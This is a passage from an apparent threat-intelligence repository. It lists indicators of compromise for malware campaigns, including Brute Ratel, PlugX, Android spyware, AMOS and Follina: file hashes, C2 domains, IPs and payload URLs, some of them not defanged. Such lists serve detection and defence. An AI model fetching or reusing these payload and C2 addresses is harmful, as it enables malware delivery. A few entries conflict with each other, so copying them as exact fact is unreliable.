sha256,3c931548b0b8cded10793e5517e0a06183b76fa47d2460d28935e28b012e426c,Variant 16 | domain,catalog[.]micrisoftdrivers[.]com,C2 server 17 | -------------------------------------------------------------------------------- /ATK-Brutel.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description, https://news.sophos.com/en-us/2023/05/18/the-phantom-menace-brute-ratel-remains-rare-and-targeted/,Observed IoCs for Brute Ratel attacks 3 | sha256,f31d785e7dc5d715a768d0d9565488cbeeb9ab35e4a0895785ecea533692176a,zip file containing Brute Ratel deployment script 4 | ip,5.78.50.172,Destination of Brute Ratel C2 request 5 | filename,emp1_julie ramzel_1040_1120s 2019-2021.zip,Delivery file for Brute Ratel installer 6 | filename,passwords_julie ramzel_1040_1120s 2019-2021.js,Brute Ratel installation / persistence script 7 | sha256,4a8495f03644db7a08d5a995b4f373eff2ade8e61261fb4818ac0bb9da7b0540,ATK/Brutel-K 8 | sha256,f86770a368d75ece9b8542e3087218c01676c0444e18d5d68f53902619049462,ATK/Brutel-H 9 | sha256,f1087f4eff735123ec5ec7fe67b11208c73fc49110bde60cecd42f1a10ed9c89,ATK/Brutel-H 10 | sha256,88908f7a8834ba08a69403af99aca50f61cb8c571fe6b50046ccba5b146f5a45,ATK/Brutel-L 11 | sha256,fe010ed0549c00326f4319c1ac2d16684957a2fd09e0c7bbfec55e92f5d8606c,ATK/Brutel-L 12 | sha256,d5b0c42ef9642dce715b252a07fc07ad9917bfdc13bd699d517b78210cc6ec60,Brute Ratel archive -------------------------------------------------------------------------------- /Android-HiddAd-T: -------------------------------------------------------------------------------- 1 | Indicators of Compromise for ANDR/HiddAd-T malware 2 | 3 | cf. https://sophos.wordpress.com/en-us/?p=55524 4 | 5 | Thanks to Trend Micro: 6 | https://blog.trendmicro.com/trendlabs-security-intelligence/adware-disguised-as-game-tv-remote-control-apps-infect-9-million-google-play-users/ 7 | https://documents.trendmicro.com/assets/AdwareFoundonGooglePlay_Appendix.pdf 8 | 9 | Web hosts used for command-and-control and ad delivery 10 | 11 | cdn.partycross.com 12 | dialog.usatek.eu 13 | dialog-4a78.kxcdn.com 14 | goldapp-bcf4.kxcdn.com 15 | mny-3f29.kxcdn.com 16 | remoteapp-3d8f.kxcdn.com 17 | remotesettings-3f29.kxcdn.com 18 | 19 | Android app links on Play Market - live (as of 2019-02-13) 20 | 21 | https://play.google.com/store/apps/details?id=com.hemanlia.cityracing.parking 22 | https://play.google.com/store/apps/details?id=com.hemanlia.racing.circuit 23 | https://play.google.com/store/apps/developer?id=Hemanlia 24 | https://play.google.com/store/apps/details?id=com.wastickerapps.flags.stickers 25 | https://play.google.com/store/apps/details?id=com.wastickerapps.heart.stickers 26 | https://play.google.com/store/apps/details?id=com.wastickerapps.animals.stickers 27 | https://play.google.com/store/apps/details?id=com.wastickerapps.espana.stickers 28 | https://play.google.com/store/apps/details?id=com.wastickerapps.nodrugs.stickers 29 | https://play.google.com/store/apps/developer?id=Teapilkate 30 | 31 | Filenames of files used for C2 instructions and advertising delivery 32 | 33 | cros1.txt 34 | cros2.txt 35 | cros3.txt 36 | cross.txt 37 | cross1.txt 38 | cross2.txt 39 | cross3.txt 40 | crossver.jpg 41 | remote.txt 42 | settings.txt 43 | settings_tvbrasil.txt 44 | settings_tvspanish.txt 45 | settings_tvusa.txt 46 | 47 | 48 | -------------------------------------------------------------------------------- /Android-fauxanticovid.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,"Indicators of bogus ""tousanticovid"" Android malware",https://news.sophos.com/en-us/2020/12/18/fishy-french-covid-contact-tracing-app-is-a-data-thief-pest/ 3 | sha256,4bbca6222f38ba4996a85bbc38c1ce6cf03e4a417dca28513c24c5799388add2,"""dog.sail.battle"" APK" 4 | sha256,7d7a99bb0893762b0b520666c55871614cfb6ffa5159ca5862d70c048d92889e,"""dog.sail.battle"" classes.dex payload" 5 | sha256,0ab6112b07b5c5c9cd0399c202b55c781ddf07539b13f90e12659e209d623500,"""trust.dragon.more"" APK" 6 | sha256,4fe6e62eed2ba12104e19ccc691e157a38d7f8f60acfbfcb5ca2184624256df7,"""trust.dragon.more"" classes.dex payload" 7 | sha256,c1dd9c26671fddc83c9923493236d210d7461b29dd066f743bd4794c1d647549,"""tuna.obvious.trust"" APK" 8 | sha256,72d5e65c99d24da89431fd445a57c7ed7aa34d4b97a4084cc7ef51b1a49e3cd9,"""tuna.obvious.trust"" classes.dex payload" 9 | sha256,5a4b556ab46d9e1e86e9cc1f7a233d53c589ecd3ba820ee7255a488f1c145311,"""tuna.obvious.trust"" json payload" 10 | sha256,c34367f5395f513b8ee0dedcd5502aed69172e71004a80c1f896ca97e05f4f62,patch.ring0 payload 11 | domain,newwaystadium.top, 12 | domain,bandofdna.top, 13 | domain,clubmasters.top, 14 | domain,jrdonnald.top, 15 | domain,differentplayers.top, 16 | ip,8.208.96.239, 17 | ip,8.208.103.115, 18 | ip,47.254.175.73, 19 | ip,47.254.146.169, 20 | ,, 21 | ,, 22 | ,, 23 | ,, 24 | ,, 25 | ,, 26 | -------------------------------------------------------------------------------- /Android-pakchat.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,"Indicators of ""pakchat"" Android malware",https://news.sophos.com/en-us/2021/01/12/new-android-spyware-targets-users-in-pakistan/ 3 | domain,kv33.zapto.org, 4 | domain,pakchat.online, 5 | domain,tplinsurance.xyz, 6 | domain,pmdu.info, 7 | domain_port,kv33.zapto.org:8887, 8 | url,pmdu.info/download/pak_citizen_portal_219.apk,SHA256 0785e57d59fe9651ac7452ec9c4b04dec2185dfcefad10ce9b0fa077c4aaac02 9 | ip,172.241.27.67,kv33.zapto.org 10 | ip,212.73.150.142,tplinsurance.xyz 11 | ip,46.183.221.240,pakchat.online 12 | ip,5.2.78.240,pmdu.info 13 | sha256,0785e57d59fe9651ac7452ec9c4b04dec2185dfcefad10ce9b0fa077c4aaac02,Pakistan Citizen Portal (com.govpk.citizensportal) 14 | sha256,139d59594d40def4d4036427f6529fe1d67de9862f7caca2d7ccf33b7fb72bfb,(test app) 15 | sha256,21e1af612302288812ab92f1786739e1877c278c520ed26e247f9b6536d0fe4b,TPL Insurance (com.tpl.insuranceapp) 16 | sha256,25444f614123d80c6dbfde4947a7af2c0ae3ce57ffbbafa7af7ff1aa8e65b77c,(test app) 17 | sha256,2bb5041907b8d74f2c123de67175a6da8747a3c1a817d006a797e863ef2f82d2,(test app) 18 | sha256,333603e999459ab1ba6f3b2b95a44d06f16abf9bbd3afbd80790ea9f88b24c83,(test app) 19 | sha256,385ef5bc6e02d7438e3c7f4b77030560435f2bf186de1d949a0855824cd88df0,(test app) 20 | sha256,6af0070f460effd0610939dda17429740d07d3d5ac496de88870b6160bb93224,Pakistan Salat Time (com.tos.salattime.pakistan) 21 | sha256,6bc9cf05d24024bf47bf6f3afddf62768bf99a065114a069674f5a0f8218b0c4,Pakistan Citizen Portal (com.govpk.citizensportal) 22 | sha256,77b6efb8d3e2be11da3d87dc18aa65e69d02f6615762dd62a15c40cae69dc421,(test app) 23 | sha256,89630dcc54e2d0f76bee8ece998b3daebee16a429309950576548ee343723cda,(test app) 24 | sha256,9ad611b1b01be253d460c33c673fd9270daba6af323c3a216ca7f2cf1f298443,class_tpl.dex DEX file payload 25 | sha256,bbe147df50234100c7d47b8a26cb3675484c2661bf2554ec327a58f37493a86b,(test app) 26 | sha256,be8250766f6669f84a4a73471fea6605a7a54ac255f601aefbc0ce810e11e858,Mobile Packages Pakistan (com.blogspot.istcpublishers.mobilepackagespakistan) 27 | sha256,dd2efee37ca82813bc1948aaeccbda4b6c025b5ba9c1c5f0ddbf590c6c5d0ac8,TPL Insurance (com.tpl.insuranceapp) 28 | sha256,df8c823f648fd33236955d47a9c4b15e320fbd9d031516b6985441b527e888a8,Registered SIMs Checker (com.siminformation.checker) 29 | sha256,e93b499f7b286bac53b1d39b25caa5d6ab0cabe30393e23b0946ebba49d34d53,Pakistan Chat (com.PakistanChatMessenger) 30 | sha256,ec776cdf07bfc3d153dbb94c975e0e5bf5bd7ebd1558994ea7ce765ec9561d9f,(test app) 31 | sha256,fd91516432e63b0a100059ed2de0ed559965ee24c9aee37ec4b9146e0d0a4ed1,class.dex DEX file payload 32 | url_path,/Chat_view/api/device_info.php, 33 | url_path,/Chat_view/api/dex/class.dex, 34 | url_path,/Chat_view/api/file_manager.php, 35 | url_path,/Chat_view/api/json/call_log.php, 36 | url_path,/Chat_view/api/json/contact.php, 37 | url_path,/Chat_view/api/json/log_data.php, 38 | url_path,/Chat_view/api/json/message.php, 39 | url_path,/Chat_view/api/location.php, 40 | url_path,/insurance/products/device_info.php, 41 | url_path,/insurance/products/dex/class_tpl.dex, 42 | url_path,/insurance/products/file_manager.php, 43 | url_path,/insurance/products/json/call_log.php, 44 | url_path,/insurance/products/json/contact.php, 45 | url_path,/insurance/products/json/log_data.php, 46 | url_path,/insurance/products/json/message.php, 47 | url_path,/insurance/products/location.php, 48 | url_path,/mobisync, 49 | -------------------------------------------------------------------------------- /Android_C23-spyware.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Notes 2 | sha256,33f79a64fee300f60541a96e2b0c4bcec3aac6f717dff52baa9da7ed803ed6f3,app.lite.bot 3 | sha256,56becf7125a1596e30f80befb986ae96e18da5be40cc3f78ac0c35ae7a4e17ae,app.lite.bot 4 | sha256,57afc0eac8b23d955b75585d5ca7b086a7e17df94b9cb276847ec1c5fe6b6c1a,org.light.upgrade 5 | sha256,c054f6597665fccd18751a88d15488657ff19a286dbd4aac7ecb773b0df60c4d,app.lite.bot 6 | sha256,db511ead013e21f51303dd4f6a856418f88d72a7f95c0b2ace0c3ba80866bdf6,com.example.telegram 7 | sha256,57bc6b95ecea7e0ca34174f1190de1e9664408311c973866b853d24f41b0e760,com.example.telegram 8 | sha256,e00179c7bc76f90864f32275de183f76730cd4a99173c0b6fd6504afa02c8d55 ,com.example.sec_chat 9 | certificate_serial,ece521e38c5e9cbea53503eaef1a6ddd204583fa, 10 | certificate_serial,d00cb9a0ab2313ee74b931a2ff7783ff3c490dac, 11 | certificate_serial,61ed377e85d386a8dfee6b864bd85b0bfaa5af81, 12 | certificate_serial,9b3a506c105d3b5ab4bd7549a8102a99ec3796cc, 13 | url,hxxps://www.jose-ross.com/api/api_portal, 14 | url,hxxps://donald-grigg.site/api/FZnW8Y, 15 | url,hxxps://donald-grigg.site/api/zsDFwsa, 16 | url,hxxps://donald-grigg.shop/api/FZnW8Y, 17 | filename,org.light.upgrade, 18 | filename,app.lite.bot, 19 | filename,com.example.telegram, 20 | filename,com.example.sec_chat, 21 | domain,jose-ross.com, 22 | domain,donald-grigg.site, 23 | domain,donald-grigg.shop, 24 | -------------------------------------------------------------------------------- /Atomic-infostealer-IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IOCs related to Atomic MacOS (AMOS) infostealer,https://news.sophos.com/en-us/2024/09/06/atomic-macos-stealer-leads-sensitive-data-theft-on-macos 3 | sha256,01082cd4733e5f3e2c3f642fa6c0afb5a9489d39ff26a35549263fc0e02ebad3,AMOS sample 4 | sha256,bda2503fc02b11258399cfabd0778a997654b5bd7d30e5e3f5bef54a74b914e1,AMOS sample 5 | sha256,C43e506c9b964dddf6fd784bf0cc78b4a2396f47257361dc22e1070e249eae16,AMOS sample 6 | sha256,4dce8b3beba71b8b44b6576ff2497ed68c6fafebd046822f0d60f8758238e900,AMOS sample 7 | sha256,564b21c293bc9d0885dc7a87dbf488a497c98d2103d91f5bbcfdb476eb8b6f4c,AMOS sample 8 | sha256,b351e3f475681ab2e8db5b2bbd2beaf26e5b4fd082ca08eba6fffbc76370113c,AMOS sample 9 | sha256,8891e7562eb4db253a8582376083ca99b19457680f9d36a5ba4108790740785e,AMOS sample 10 | sha256,716778bab5fb2c439a51362be5941a50d587714d58a6faa39eefa96aa79c1561,AMOS sample 11 | sha256,d23491dd351f43f0efad5cee2be80c4049349a7695c0e7de1de632c791356183,AMOS sample 12 | sha256,7bcfcc90d0bd6c85b5b1cc9f287e161020571a0418afb50f2dd67685e9d3a4fc,AMOS sample 13 | domain,nextnovatech.com,Domain which hosted AMOS malware 14 | domain,wooofi.com,Domain which hosted AMOS malware 15 | domain,slackcomtop.aab-e-pak.com,Malvertising domain 16 | domain,slackforbusiness.net,Malvertising domain 17 | url_path,slackforbusiness.net/api.php,Malvertising domain 18 | url_path,slackforbusiness.net/main.php,Malvertising domain 19 | domain,macpaw.us,Malvertising domain 20 | -------------------------------------------------------------------------------- /CVE-2018-0798 RTFs: -------------------------------------------------------------------------------- 1 | As referenced in https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/ 2 | 3 | This is not a comprehensive list of samples, but examples of malicious RTF files that abuse Equation Editor to deliver the payloads named here: 4 | 5 | 74ae0b8d7bef81cffd520a07e2998ba49e83b912 -> Fareit 6 | 92f5b35847b3c4fb1b888a01da1affcc6f29a8ae -> Fareit 7 | 52171176b0a6ba2577e52b9f45cc2192c3740a8f -> Fareit 8 | a5d1dc74f9bd45b499942f4cc274783691ea936b -> FormBook 9 | 4c67b346a4541ea6ebbf02c893ecb4b8da8217c4 -> AzoruLT 10 | b2320f9944f4d186d6b684d462dee37711535003 -> Lokibot 11 | 5fd1c86426a5d67271c9e35655a0eb848ba83996 -> Lokibot 12 | -------------------------------------------------------------------------------- /CVE-2022-26134_attacks.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IoCs related to exploits against Confluence servers (CVE-2022-26134),https://news.sophos.com/en-us/2022/06/16/confluence-exploits-used-to-drop-ransomware-on-vulnerable-servers 3 | sha256,8cc698fe9018b617b7a5e442e5e2c2d7bb015ef39a02908d55976bb8e45991db,PHP reverse shell (Troj/WebShel-DB) 4 | sha256,f4575af8f42a1830519895a294c98009ffbb44b20baa170a6b5e4a71fd9ba663,ASP reverse shell (Troj/WebShel-BU) 5 | sha256,f301501b4e2b8db73c73a604a6b67d21e24c05cb558396bc395dcb3f98de7ccf,Cerber ransomware payload 6 | sha256,96fd2b9ddd43ce02cde9efd4b994cc96616d37c4d6b98d811006d13019e18ece,Cobalt Strike precursor script (ATK/ChimeraPS-A) 7 | url,hxxp://149.57.170.179/mirai.x86/mirai.x86,pwnkit download 8 | url,hxxps://webhook.site/53857c02-8d5f-4163-8c13-f2dfb8b3e8c2/, 9 | url,hxxp://46.101.193[.]140/tmp.1w,URL hosting Cerber ransomware 10 | url,hxxp://167.99.57[.]116/tmp.2w,URL hosting Cerber ransomware 11 | url,http://159.223.34[.]25/tmp.3w,URL hosting Cerber ransomware 12 | ip,159.234.34.25,IP hosting Cerber ransomware 13 | -------------------------------------------------------------------------------- /CVE-2022-3236_IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,IOCs from this published report,https://news.sophos.com/en-us/2022/10/19/sophos-x-ops-finds-attackers-using-covert-channels-in-backdoor-against-devices/ 3 | domain,lifeforkids.org,Network activity 4 | domain,thecybernetwork.org,Network activity 5 | filename,/var/.aoq9,Payload delivery 6 | filename,/var/.HML4,Payload delivery 7 | filename,/var/.x7ZZ,Payload delivery 8 | filename,/var/.xAKW,Payload delivery 9 | filename,/tmp/.s.PGSQL.5432.lock.,Persistence mechanism 10 | filename,/var/cache/update.log,Persistence mechanism 11 | filename,agent_keys,Persistence mechanism 12 | filename,/var/ime.pl,Persistence mechanism 13 | filename,/var/tmp/new_keys,Persistence mechanism 14 | filename,/var/syslog-ng.cfg,Persistence mechanism 15 | filename,MANIFEST.MF,Persistence mechanism 16 | filename,metasploit.dat,Persistence mechanism 17 | filename,Payload.class,Persistence mechanism 18 | filename,/var/.s,Persistence mechanism 19 | filename,/var/.p,Persistence mechanism 20 | filename,/usr/share/jetty/lib/.ser.dat,Persistence mechanism 21 | filename,/var/SessionAgent,Persistence mechanism 22 | filename,/var/wafdb,Persistence mechanism 23 | filename,/var/sqlite_lib,Persistence mechanism 24 | filename,/var/.Sophos,Persistence mechanism 25 | filename,/var/logfile,Persistence mechanism 26 | filename,/var/logd,Persistence mechanism 27 | ip,8.218.20.170,Network activity 28 | ip,49.157.28.67,Network activity 29 | ip,49.157.28.12,Network activity 30 | ip,45.154.13.158,Network activity 31 | ip,103.38.214.96,Network activity 32 | ip,103.254.75.233,Network activity 33 | ip,2.59.153.108,Network activity 34 | ip,116.93.124.244,Network activity 35 | ip,43.243.127.203,Network activity 36 | ip,116.93.120.66,Network activity 37 | ip,2.59.153.110,Network activity 38 | ip,158.247.233.20,Network activity 39 | ip,154.220.2.207,Network activity 40 | ip,45.32.99.124,Network activity 41 | ip,2.59.153.65,Network activity 42 | ip,158.247.199.212,Network activity 43 | ip,47.254.38.85,Network activity 44 | ip,8.210.125.223,Network activity 45 | ip,98.159.232.194,Network activity 46 | ip,193.37.32.134,Network activity 47 | ip,193.176.211.245,Network activity 48 | ip,98.159.232.228,Network activity 49 | ip,47.242.146.145,Network activity 50 | ip,91.98.100.186,Network activity 51 | ip,109.248.19.89,Network activity 52 | sha256,1c067b1cb684b39f647d8cb26ed286b3a9797acfef1c05ca58d6535c77c90bcd,Payload delivery 53 | sha256,fe98309d6697b669406a5b8ac8100e569ff0bfa12b6a97309f5fbddd79f1401a,Payload delivery 54 | sha256,8a070d10b14003bc8c6217bd9dc73e3d8f4771b9053a51a8a3071ec13b15cb12,Payload delivery 55 | sha256,ff8cb500398e85087f501dcf34194b419de64298378e22ffbaf7b17fe2fa41b2,Payload delivery 56 | sha256,7795454b2ca74c065ecb7281e0e02c224a26877d96243264e6469d18f1a3725b,Payload delivery 57 | sha256,b8a7d4636545f1402230166186ab681b46b8b1a08fcea6435d022ce677bd39c4,Payload delivery 58 | sha256,24cc043f1a70fde20c779cd24d6bf906680725a8096a31bcadf8cf13c532092c,Payload delivery 59 | sha256,cf52a7888913a0370983484b3d885f64ad3b1603721b1967f571afe14ff30614,Payload delivery 60 | sha256,378c05bf38a097e0092251d562dbac723b37f4b7a42e3b91c1623773d9ad6f0b,Payload delivery 61 | sha256,487bc1cf00f37606cff612321c2d75f54565a7b8bc6c0a8be15ef30ee4d4f33c,Payload delivery 62 | sha256,77ee7861903ede9ae3491dca0c0ef89286c5a0bdf223617ea3acb49e25c996af,Payload delivery 63 | sha256,62ef532c0818e89e385457f8d7a7b1ed1f089e40eb6e41fd46e34be4ca34929b,Payload delivery 64 | sha256,eb00b14dd2fd2bc316597159a8a95c38ac57ab96e8e0f228abf3658a3a5d9e25,Payload delivery 65 | sha256,468e6d852f308391d912564cf6809a93a35bcc90ec01fb3ab5338e781a3e67f9,Payload delivery 66 | sha256,8b62a849cb78ce0823efaded3b6b449dea20de21c0d211bb9191a367dd8427cd,Payload delivery 67 | sha256,7f36e13e6ac0197a76dd067508aee19b3c3af894c2118bb116bef500112a66aa,Payload delivery 68 | sha256,c716da8d8bfabc7309a8ee84d126b38404575c1903716c35ad9ef830847d523d,Payload delivery 69 | sha256,797928fd9bed6967c9951d6f76043e9d5527fae6e0e0808910f57edfe37badd0,Payload installation 70 | sha256,33203910db4bbcf10a70831ec6033269cc0eaa577b28e45b18f1a1731cdb093d,Payload installation 71 | sha256,8bc5de6f2182c6a3a0fa42ee318f7fcfa6bba041cb2605afdbef8b4dfba3f8b3,Payload installation 72 | sha256,400f7c32e6ad12626c33db75a71bf3365b2a2390e27705948116fd14e14108d0,Payload installation 73 | sha256,8807d3af522ab2509c926d5103d7b40fb83627ce5d6c46d4ca0f180df5460d13,Payload installation 74 | sha256,fe4f6d515e597a34d6b3cc7a067455aa01409048e314400f9515175daa1b050b,Payload installation 75 | sha256,c20ed7139ad4666cf3167cca41ae85b4d967969e2f76e59dab2cd30a14ae9f90,Payload installation 76 | sha256,0c4c5c036272eb19d5617c9ce072e14ffb795a354dc682e6b0d144143ac4c7b4,Payload installation 77 | sha256,972303aa2e791855e679559ce13f5dd2bc7b8197c4372212ea130fd3489f8ff2,Payload installation 78 | sha256,87947ae2f74a14cecba57d00b9b35a1a0d63ecb572523ceb4d55343e72d88174,Payload installation 79 | sha256,25fbfaa4ed12117c763a851aaaf83f901dc44b963a5269526c31845c54cbd518,Payload installation 80 | sha256,f2878d5530a4155c20c0e31b37106b73dd88094aa615156026462ab6a7c719f2,Payload installation 81 | sha256,ee3b8c0811a437f5e0962156b3e7e0d87bd63f488dce8dd43f4e1d28949a9b39,Payload installation 82 | sha256,46a4ca13eb7df6db23d309e0442694b35ecffa5bebfc3a4af1fda3c1f6ba79f4,Payload installation 83 | sha256,4706478c6a8d4d96826d0bc31150c7df7cf1ecda8b07e07d874c2e3c62478389,Payload installation 84 | sha256,6bb5c05e4b6a9226ac27c59808bd10f4dc685df92bff163f8dfde6a95273062d,Payload installation 85 | sha256,9b1a1156ffbcc1349978b971f983b1bb816781844581f403da1b6517f86424f0,Payload installation 86 | ,, 87 | ,, 88 | "#In addition, we observed that the following legitimate files were modified by attackers",, 89 | filename,/bin/screenmgr.pl,Persistence mechanism 90 | filename,/lib/perl5/5.20/CLV/WebsocketServer.pm,Persistence mechanism 91 | filename,/usr/share/jetty/lib/servlet-api-3.1.jar,Persistence mechanism 92 | -------------------------------------------------------------------------------- /CloudChat-IOCs.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,Thread on CloudChat installer compromise,Observed IOCs for CloudChat installer compromise 3 | sha256,74212e85ce765cbabb16395834de85d1882fb5fc6c98a67e7b9092969b999948,Trojanized CloudChat installer 4 | sha256,f7c139534459bbebab8a919bf9f2bac233caffcde5d072d1b10bc82ce233d875,Trojanized CloudChat installer 5 | sha256,89b91f421e2a7b151e55583fb9182f74738b5eb1105143e80fb2f0b6fac9b7ff,Trojanized CloudChat installer 6 | sha256,ece0e08568fe8e8614de830ea07c0217187a347c18c27eb7b18915573f2f76b8,Trojanized CloudChat installer 7 | sha256,f8103fbbdf94b4b00722fa78b343735c124663d53ca61bbfa2f57ed1c7675786,Trojanized CloudChat installer 8 | sha256,17b31898c3613d6e86d06260c7e6f7738d3afdf0f0a4010e2f5259c502d38b09,Loader DLL 9 | sha256,1aad361237d0960758bb26ee7bbe3c20cccabb1744bb91874198c68dbe6e14ee,Loader DLL 10 | sha256,23604a06b0720a430f8d6f6b14b589d850e4cfd291a47f22f199324f21169c1a,Loader DLL 11 | sha256,8823cccd97d261053a89cc9ebdfafe8f828f2b811c722914156f28d8bd239970,Loader DLL 12 | sha256,8f40e019a09dc2b16ac3e9c3902844313d4c75df35c3d40c4376d14c320f08c3,Loader DLL 13 | filename,code1.dll,Loader DLL 14 | filename,d3lib1.dll,Loader DLL 15 | filename,code3.dll,Loader DLL 16 | url_path,https://ilha.tw/images/top_product05.png,Stager payload 17 | url_path,https://liveware-a.tw/images/top_product05.png,Stager payload 18 | url_path,https://www.emetore-tw.com/images/top_product05.png,Stager payload 19 | url_path,https://www.sibody.tw/images/pic_brand_00.png,Stager payload 20 | url_path,https://www.sibody.tw/images/pic_brand_01.png,Stager payload 21 | url,https://ilha.tw,Stager payload domain 22 | url,https://livewire-a.tw,Stager payload domain 23 | url,https://www.emetore-tw.com,Stager payload domain 24 | url,https://www.sibody.tw,Stager payload domain 25 | ip,5.181.132.169,C2 26 | ip,45.121.147.227,C2 27 | ip,103.75.191.90,C2 28 | ip,103.169.91.16,C2 29 | url,api.holencity.com,C2 30 | url,solar.chatgroup.org,C2 31 | url,www.cloudchatpc.com,C2 32 | mutex,lks2x,Mutex 33 | -------------------------------------------------------------------------------- /Cryptorom_fakeapps_2.csv: -------------------------------------------------------------------------------- 1 | Indicator,Data,Note 2 | url,https://apps.apple.com/us/app/bone-global/id6446169496,iOS fake crypto app 3 | url,https://apps.apple.com/US/app/berryx/id6444883215,iOS fake crypto app 4 | url,https://apps.apple.com/us/app/momclub/id6446796051,iOS fake crypto app 5 | url,https://apps.apple.com/us/app/koproplus/id6447481214,iOS fake crypto app 6 | url,https://apps.apple.com/us/app/clueeio/id6446766050,iOS fake crypto app 7 | url,https://apps.apple.com/us/app/cmus/id6446474214,iOS fake crypto app 8 | url,https://apps.apple.com/ph/app/nicaragua-bitcloud/id1669626299, iOS fake crypto app 9 | url,https://apps.apple.com/ph/app/uou-pro/id6446106583, iOS fake crypto app 10 | url,https://play.google.com/store/apps/details?id=plus.BoneGlobal, Android fake crypto app 11 | SHA256,c9a0338ba68e0bbbf06d1bd763e4f4d89a53cf3f0edffa7f0a270bcf459dbe87, iPhona fake app bundleID - com.BookProtector.myreadexperice 12 | SHA256,a712d7ccf54188ec2986a0d4ebe616d52a88624f8efb7f8e1230e54eda5b29ad, Android fake app packagename - plus.BerryX 13 | domain,momclub-coin.com, C2 for fake crypto app 14 | domain,melnie.net, C2 for fake crypto app 15 | domain,coinclue.com, C2 for fake crypto app 16 | domain,koexchange.tw, C2 for fake crypto app 17 | -------------------------------------------------------------------------------- /DLLsideloading-PlugX-USBworm-2023-03.csv: -------------------------------------------------------------------------------- 1 | Indicator_type,Data,Note 2 | Description,https://news.sophos.com/en-us/2023/03/09/border-hopping-plugx-usb-worm/,Indicators of PlugX USB worm variant active Jan-2023 3 | sha256,352fb4985fdd150d251ff9e20ca14023eab4f2888e481cbd8370c4ed40cfbb9a,"wsc.dll, malicious loader" 4 | sha256,5b807629ab299abec70f88f861487c55a6795d6e27e5d85c64080f072132558c,"wsc.dll, malicious loader" 5 | sha256,6bb959c33fdfc0086ac48586a73273a0a1331f1c4f0053ef021eebe7f377a292,"wsc.dll, malicious loader" 6 | sha256,e8f55d0f327fd1d5f26428b890ef7fe878e135d494acda24ef01c695a2e9136d,"wsc.dll, malicious loader" 7 | sha256,edaa8b62467246d9a43e0f383ed05bc3272d2f8b943a79d9d526f8225c58d1e6,"wsc.dll, malicious loader" 8 | sha256,432a07eb49473fa8c71d50ccaf2bc980b692d458ec4aaedd52d739cb377f3428," *AvastAuth.dat , payload file" 9 | url,45.142.166.112,C2 server 10 | -------------------------------------------------------------------------------- /Follina_CVE-2022-30190_hashes.csv: -------------------------------------------------------------------------------- 1 | type,hash,notes 2 | description,Files related to Follina attacks described in our blog post,https://news.sophos.com/en-us/2022/05/30/follina-word-doc-taps-previously-unknown-microsoft-office-vulnerability/ 3 | sha256,36482C40E2D334804AC41992FDCD1167BF0A9DC962960D1C2E4746485FBB4449,02678915_609919.img 4 | sha256,67A0F87F0A02928A5D5FCADA88F0140DD49F3C08B560AF9C5A6041C755369BC1,02678915_609919.zip 5 | sha256,A3FA09129376C9AB281222188F1C4567BC71D74BBEC49B1533923085D0B01BFA,26557006_614812.img 6 | sha256,6D183B80241DB4ADFEF8FCF140B393492DA3E552FB4FC0F2A2EFF1FE4DA26909,26557006_614812.zip 7 | sha256,7A65ED17321546D130111899D9F9D443C9389D9D161BD34DA38486BDBBC8F197,30396299_590251.img 8 | sha256,2BD51003F5E62E5BF21C966276F0A3DDD02132BD679772F893997B53AF913253,30396299_590251.zip 9 | sha256,E7CAE387EC2495D34F837B56CE108FD0159EF6FC4451EB2A27C27CDDEED85F3B,32334184_838865.img 10 | sha256,A4B20C7366C87533A4C2A1667669BB8B1D447CA5636682272ACBE0B1850C1E61,32334184_838865.zip 11 | sha256,453BFE8C92D5A46F4234557E94FD90F5750D71DFFB8951901C886A89A39E3007,45620617_040352.img 12 | sha256,616685E44142E4482B5882F293BDB4A2EC09BE5279DE81D6D6BC3325ED37D728,45620617_040352.zip 13 | sha256,93B33CBD26A04342F6A27DEC12ADEF0643176BA034B69788EB60CFFCFBBBB328,76380133_398594.img 14 | sha256,7250223E21C275113EFEBAE86CFA930943D2672A9304884A3763C5AA636AA556,76380133_398594.zip 15 | sha256,D2FEE623915B8FA700887A3906C4A336CCD021AEEF13E8D4F2C9A8999269ED58,81309141_826084.img 16 | sha256,CD52A66892E2AD2C1264FB2127FC09DB35DF972096136385EACAB36D3C24375E,81309141_826084.zip 17 | sha256,44B38A16CDAA3F5C56E3C9ECBD4688CCE035EC59E5853B8497587017CE5BFF0A,82360680_720820.img 18 | sha256,F9D6759B695E2E8CA5D7F10C396315820D6B607451B34C6322B2C299A33F660B,82360680_720820.zip 19 | sha256,CAC7A421BFB9DB223494EE6A3E07409ACE4C336DFF810FD33B0C7C3C18201893,87543611_161292.img 20 | sha256,E82B7464ACF14B443269E414674C4E4CF4FA7A0259105B784B09104FD9F95741,87543611_161292.zip 21 | sha256,F62B9BE746830B13DFE88FD56D00DC1CBF21F3FF14BD3B359501FD79CF870DC6,90405769_114456.img 22 | sha256,AE26211E0A48C80576D0EEF2EC919BE08E6E0D4B83BA940A53509352ABBC457A,90405769_114456.zip 23 | sha256,077CA8645A27C773D9C881AECF54BC409C2F8445AE8E3E90406434C09ACE4BC2,02678915_609919\019338921.dll 24 | sha256,03160BE7CB698E1684F47071CB441FF181FF299CB38429636D11542BA8D306AE,Windows shortcut .lnk file (various filenames/reused) 25 | sha256,D20120CC046CEF3C3F0292C6CBC406FCF2A714AA8E048C9188F1184E4BB16C93,Follina-maldoc (various filenames/reused) 26 | sha256,5084694BD772ED8391B2FE294615FA01FA4470F2226F8979096C9AE180DD650A,26557006_614812\019338921.dll 27 | sha256,5F8FC55C8361897AF6650C115495AB798D337A3873137A49D4C986F104DDDEA0,30396299_590251\019338921.dll 28 | sha256,F0D9AAD850C8CB629DB39BBF0C5AE4A00B5E3ACADBFF1FE651B77F23D7A7D4B1,32334184_838865\019338921.dll 29 | sha256,607C59AE954BFD4ED958A71C38D744433FC18B0B804D7915CA000ADB6894282F,45620617_040352\019338921.dll 30 | sha256,5F8FC55C8361897AF6650C115495AB798D337A3873137A49D4C986F104DDDEA0,76380133_398594\019338921.dll 